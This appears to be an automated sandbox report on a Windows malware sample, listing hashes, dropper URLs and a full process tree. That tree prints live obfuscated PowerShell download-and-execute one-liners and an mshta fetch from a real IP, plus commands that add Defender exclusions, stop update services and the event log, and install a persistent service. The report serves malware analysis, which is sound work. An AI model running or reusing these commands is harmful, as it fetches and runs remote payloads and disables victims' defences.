Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:44

General

  • Target

    GRGFK_file.exe

  • Size

    50KB

  • MD5

    666248c216a3f63828f739839230f9f6

  • SHA1

    13690837235053762a538b4c5b2b601ec9f6bb22

  • SHA256

    00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

  • SHA512

    37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

  • SSDEEP

    768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Loads dropped DLL
      PID:476
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:596
          • C:\Windows\system32\wbem\wmiprvse.exe
            C:\Windows\system32\wbem\wmiprvse.exe
            3⤵
            • Drops file in System32 directory
            PID:1016
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1760
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              3⤵
              • Checks processor information in registry
              PID:2888
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:676
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              • Indicator Removal: Clear Windows Event Logs
              PID:760
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:820
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                  • Drops file in Windows directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:860
                  • C:\Windows\system32\wbem\WMIADAP.EXE
                    wmiadap.exe /F /T /R
                    3⤵
                      PID:3024
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:976
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:268
                      • C:\Windows\system32\taskhost.exe
                        "taskhost.exe"
                        2⤵
                          PID:1056
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:1064
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1132
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:752
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2760
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2380
                                  • C:\ProgramData\Mig\Mig.exe
                                    C:\ProgramData\Mig\Mig.exe
                                    2⤵
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1996
                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2820
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      3⤵
                                        PID:2484
                                        • C:\Windows\system32\wusa.exe
                                          wusa /uninstall /kb:890830 /quiet /norestart
                                          4⤵
                                          • Drops file in Windows directory
                                          PID:1964
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:2600
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:1940
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        3⤵
                                        • Launches sc.exe
                                        PID:2568
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        3⤵
                                        • Launches sc.exe
                                        PID:1872
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        3⤵
                                        • Launches sc.exe
                                        PID:1972
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2488
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1652
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1352
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2516
                                      • C:\Windows\system32\dialer.exe
                                        C:\Windows\system32\dialer.exe
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1832
                                      • C:\Windows\system32\dialer.exe
                                        C:\Windows\system32\dialer.exe
                                        3⤵
                                          PID:1296
                                        • C:\Windows\system32\dialer.exe
                                          dialer.exe
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1568
                                    • C:\Windows\system32\lsass.exe
                                      C:\Windows\system32\lsass.exe
                                      1⤵
                                        PID:484
                                      • C:\Windows\system32\lsm.exe
                                        C:\Windows\system32\lsm.exe
                                        1⤵
                                          PID:492
                                        • C:\Windows\Explorer.EXE
                                          C:\Windows\Explorer.EXE
                                          1⤵
                                            PID:1176
                                            • C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe
                                              "C:\Users\Admin\AppData\Local\Temp\GRGFK_file.exe"
                                              2⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:2500
                                              • C:\Windows\system32\wscript.exe
                                                "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2548
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1728
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                    5⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2160
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                      6⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2868
                                                      • C:\Windows\system32\mshta.exe
                                                        mshta http://176.113.115.178/Windows-Update
                                                        7⤵
                                                        • Blocklisted process makes network request
                                                        • Modifies Internet Explorer settings
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2600
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                          8⤵
                                                          • UAC bypass
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Loads dropped DLL
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1632
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2568
                                                          • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                            "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                            9⤵
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Drops file in System32 directory
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2448
                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Drops file in System32 directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1724
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              10⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:960
                                                              • C:\Windows\system32\wusa.exe
                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                11⤵
                                                                • Drops file in Windows directory
                                                                PID:1704
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1292
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2916
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1608
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop bits
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1252
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop dosvc
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:776
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2404
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2092
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1568
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              10⤵
                                                              • Power Settings
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2280
                                                            • C:\Windows\system32\dialer.exe
                                                              C:\Windows\system32\dialer.exe
                                                              10⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1448
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe delete "LIB"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2324
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2276
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe stop eventlog
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:2064
                                                            • C:\Windows\system32\sc.exe
                                                              C:\Windows\system32\sc.exe start "LIB"
                                                              10⤵
                                                              • Launches sc.exe
                                                              PID:1228
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1792
                                                  • C:\Windows\system32\ipconfig.exe
                                                    "C:\Windows\system32\ipconfig.exe" /flushdns
                                                    5⤵
                                                    • Gathers network information
                                                    PID:1160
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "1093872636-98770726189291811-674463445662705599-1420527359-492369512-433891325"
                                            1⤵
                                              PID:2944
                                            • C:\Windows\system32\conhost.exe
                                              \??\C:\Windows\system32\conhost.exe "1278316771069943630733583513499642870713752335-392429908-293599347-945817495"
                                              1⤵
                                                PID:2100
                                              • C:\Windows\system32\conhost.exe
                                                \??\C:\Windows\system32\conhost.exe "1392297501-136729786-1574935317712526789-138423368014779102356959414941152457754"
                                                1⤵
                                                  PID:3068
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-107261553-727417454-20627100801296847340-259591075-511057529813253292880"
                                                  1⤵
                                                    PID:2388
                                                  • C:\Windows\system32\conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe "-2041207293-654718478-19870179831194046535-8020476351865838050759730972-17626046"
                                                    1⤵
                                                      PID:2412
                                                    • C:\Windows\system32\conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe "14415618672007507083-1947217072266699287-2078771830-5196751231227055814-1305977794"
                                                      1⤵
                                                        PID:324
                                                      • C:\Windows\system32\conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe "-11653515044098221031936495319-165647501-785732439-223517622-174885394342713079"
                                                        1⤵
                                                          PID:1168
                                                        • C:\Windows\system32\conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe "7381237821642329133-537978835150621927073942420761715383945237387658550117"
                                                          1⤵
                                                            PID:2812
                                                          • C:\Windows\system32\conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe "1958419288676027462505550483-1787620150133642223-787073684813512879889944081"
                                                            1⤵
                                                              PID:2140
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "-819555644-15303328178600602291755182339-9294407984901380711000409103-415890403"
                                                              1⤵
                                                                PID:1564
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "-2379549201174109886-66061726-19980820411345001851610039256-1403470178-764686109"
                                                                1⤵
                                                                  PID:1880

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                  Filesize

                                                                  2KB

                                                                  MD5

                                                                  82f229d0c36b68073da70ef5958e425d

                                                                  SHA1

                                                                  2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                  SHA256

                                                                  0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                  SHA512

                                                                  4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                  Filesize

                                                                  27KB

                                                                  MD5

                                                                  238ec4d17050e1841e8e0171407c2260

                                                                  SHA1

                                                                  2c8c14b257641f1e1151c6303dabde01621314f2

                                                                  SHA256

                                                                  163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                  SHA512

                                                                  3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                  Filesize

                                                                  7KB

                                                                  MD5

                                                                  f49bfdbbedc1cfa82bcc1c67cfe861a8

                                                                  SHA1

                                                                  e458cf588723d69228f137495ef1c228e6771254

                                                                  SHA256

                                                                  eda1aa8396a266834e3713eea72b246f534124a79160128b9a0141d2a16a5eaf

                                                                  SHA512

                                                                  a095098a47a7b18678d6e8195481e47dd02bb1aa835121f3d3f18ace12273f90f2766e63bbfd1b6118e648e6fe72df47f45bac7b7cd6f60e1af359bf718c33de

                                                                • \??\PIPE\srvsvc

                                                                  MD5

                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                  SHA1

                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                  SHA256

                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                  SHA512

                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                • \Users\Admin\AppData\Roaming\LB31.exe

                                                                  Filesize

                                                                  7.3MB

                                                                  MD5

                                                                  c9e6aa21979d5fc710f1f2e8226d9dfe

                                                                  SHA1

                                                                  d881f97a1fe03f43bed2a9609eae65531cf710cf

                                                                  SHA256

                                                                  a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d

                                                                  SHA512

                                                                  9e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627

                                                                • memory/428-68-0x0000000000C40000-0x0000000000C6B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/428-62-0x0000000000B70000-0x0000000000B94000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/428-70-0x0000000037400000-0x0000000037410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/428-69-0x000007FEBD5D0000-0x000007FEBD5E0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/428-64-0x0000000000B70000-0x0000000000B94000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/476-72-0x0000000000100000-0x000000000012B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/476-73-0x000007FEBD5D0000-0x000007FEBD5E0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/476-74-0x0000000037400000-0x0000000037410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/476-570-0x000000013FB10000-0x000000014060F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/476-336-0x000000013FB10000-0x000000014060F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/484-79-0x00000000001A0000-0x00000000001CB000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/484-80-0x000007FEBD5D0000-0x000007FEBD5E0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/484-81-0x0000000037400000-0x0000000037410000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/1448-57-0x00000000773C0000-0x0000000077569000-memory.dmp

                                                                  Filesize

                                                                  1.7MB

                                                                • memory/1448-58-0x00000000771A0000-0x00000000772BF000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/1448-59-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1448-55-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1448-56-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1448-51-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1448-53-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1448-52-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                  Filesize

                                                                  172KB

                                                                • memory/1632-44-0x000000013F350000-0x000000013FE4F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/1632-30-0x000000001B620000-0x000000001B902000-memory.dmp

                                                                  Filesize

                                                                  2.9MB

                                                                • memory/1632-31-0x00000000028E0000-0x00000000028E8000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/1792-22-0x0000000002D60000-0x0000000002D7A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                • memory/1792-17-0x0000000002340000-0x0000000002348000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/1792-16-0x000000001B720000-0x000000001BA02000-memory.dmp

                                                                  Filesize

                                                                  2.9MB

                                                                • memory/1996-386-0x000000013FB10000-0x000000014060F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/1996-338-0x000000013FB10000-0x000000014060F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/2448-315-0x000000013F350000-0x000000013FE4F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/2448-45-0x000000013F350000-0x000000013FE4F000-memory.dmp

                                                                  Filesize

                                                                  11.0MB

                                                                • memory/2500-0-0x000007FEF5EC3000-0x000007FEF5EC4000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                • memory/2500-6-0x000007FEF5EC0000-0x000007FEF68AC000-memory.dmp

                                                                  Filesize

                                                                  9.9MB

                                                                • memory/2500-5-0x000007FEF5EC0000-0x000007FEF68AC000-memory.dmp

                                                                  Filesize

                                                                  9.9MB

                                                                • memory/2500-2-0x0000000000140000-0x0000000000146000-memory.dmp

                                                                  Filesize

                                                                  24KB

                                                                • memory/2500-1-0x0000000001280000-0x0000000001292000-memory.dmp

                                                                  Filesize

                                                                  72KB